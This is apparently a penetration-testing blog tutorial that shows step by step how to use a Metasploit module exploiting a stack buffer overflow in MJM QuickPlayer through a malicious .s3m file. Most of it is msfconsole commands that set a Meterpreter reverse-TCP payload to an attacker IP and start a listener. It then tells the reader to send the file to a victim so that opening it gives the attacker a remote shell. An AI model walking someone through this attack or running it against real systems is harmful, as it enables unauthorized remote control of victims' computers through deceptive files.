Categories

Archives

Kali Linux, Penetration Testing

Hack Remote PC Using MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow

This module exploits a stack buffer overflow in MJM QuickPlayer 1.00 beta 60a and QuickPlayer 2010 (Multi-target exploit). When opening a malicious s3m file in one of these 2 applications, a stack buffer overflow can be triggered, resulting in arbitrary code execution. This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.

Exploit Targets

Windows XP SP 3

Windows 7

QuickPlayer 2010

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/fileformat/mjm_quickplayer_s3m

msf exploit (mjm_quickplayer_s3m)>set payload windows/meterpreter/reverse_tcp

msf exploit (mjm_quickplayer_s3m)>set lhost 192.168.0.104 (IP of Local Host)

msf exploit (mjm_quickplayer_s3m)>exploit

After we successfully generate the malicious s3m File, it will stored on your local computer

/root/.msf4/local/song.s3m

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.104

exploit

Now send your song.s3m files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.